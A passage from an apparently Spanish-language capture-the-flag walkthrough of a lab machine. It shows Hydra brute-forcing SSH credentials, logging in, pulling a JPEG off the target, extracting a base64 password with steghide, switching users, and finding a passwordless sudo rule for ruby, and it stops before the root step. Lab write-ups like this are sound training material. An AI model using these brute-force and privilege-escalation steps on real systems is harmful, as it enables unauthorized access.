Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-17 12:36:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: carlota password: babygirl
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 25 final worker threads did not complete until end.
[ERROR] 25 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-17 12:36:22
Vemos que hemos obtenido unas credenciales, por lo que entraremos por SSH.
SSH
ssh carlota@<IP>
Metemos como contraseña babygirl y veremos que estamos dentro.
Escalate user oscar
Si nos vamos a la siguiente ruta:
cd /home/carlota/Desktop/fotos/vacaciones
Veremos un archivo llamado imagen.jpg, que podemos sospechar de que pueda tener algo en su interior, ya que no encontramos ningun vector de entrada mas, por lo que nos lo pasaremos a nuestro host.
python3 -m http.server
Y ahora en nuestro host ejecutaremos lo siguiente:
wget http://<IP>:8000/imagen.jpg
Ahora veremos que tiene algo dentro con el siguiente comando:
steghide extract -sf imagen.jpg
Info:
Enter passphrase:
wrote extracted data to "secret.txt".
Vemos que nos extrae un archivo llamado secret.txt y si lo leemos veremos lo siguiente:
ZXNsYWNhc2FkZXBpbnlwb24=
Por lo que vemos esta en Base64, y si lo decodificamos quedara de esta forma:
echo "ZXNsYWNhc2FkZXBpbnlwb24=" | base64 -d
Info:
eslacasadepinypon
Por lo que vemos puede ser la contraseña de algun usuario del sistema, por lo que vamos a probar con el siguiente usuario.
su oscar
Metemos como contraseña eslacasadepinypon y veremos que somos dicho usuario.
Escalate Privileges
Si hacemos sudo -l veremos lo siguiente:
Matching Defaults entries for oscar on caa1dc877f39:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User oscar may run the following commands on caa1dc877f39:
(ALL) NOPASSWD: /usr/bin/ruby
Vemos que podemos ejecutar el binario ruby como el usuario root, por lo que haremos lo siguiente: